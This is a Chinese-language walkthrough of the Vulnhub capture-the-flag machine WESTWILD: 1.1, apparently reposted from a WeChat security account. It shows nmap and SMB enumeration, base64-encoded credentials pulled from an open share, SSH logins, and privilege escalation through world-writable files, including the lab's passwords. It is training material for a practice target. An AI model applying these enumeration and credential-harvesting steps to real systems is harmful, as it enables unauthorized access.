大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的知识。
靶机描述:
下载地址:http://www.vulnhub.com/entry/westwild-11,338
级别:中级
信息收集
靶机ip扫描
arp-scan -l
kali攻击机:192.168.86.138
靶机:192.168.86.167
查看开放端口及版本、脚本信息探测
nmap -sC -sV -p- 192.168.86.167 --min-rate=2000
-sC 脚本探测
-sV 版本探测
-p- 全端口探测
--min-rate 带宽配置 加速扫描
查看80端口页面和目录扫描均没有得到有价值信息,只能由445端口入手,它作用是实现一些共享文件夹以及一些共享打印机的访问工作,使用enum4liux进行枚举查看可用信息,找到共享目录wave
enum4linux 192.168.86.167
使用smbclient(samba client)命令让Linux系统显示Windows系统所分享的资源
smbclient -L \192.168.86.167
-L:显示服务器端所分享出来的所有资源
密码为空密码
FLAG1
进入共享文件夹查看信息
smbclient //192.168.86.167/wave
在kali里查看信息,拿到FLAG1
使用base64进行解码,得到账号密码
使用ssh连接成功
wavex/door+open
提权
尝试切换root权限失败,使用find命令查找可读可写可执行文件,找到用户名aveng和密码
find / -type f -perm 0777 2>/dev/null
使用ssh连接成功
aveng/kaizen+80
FLAG2
切换root成功
拿到FLAG2
本文始发于微信公众号(亿人安全):Vulnhub-WESTWILD: 1.1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论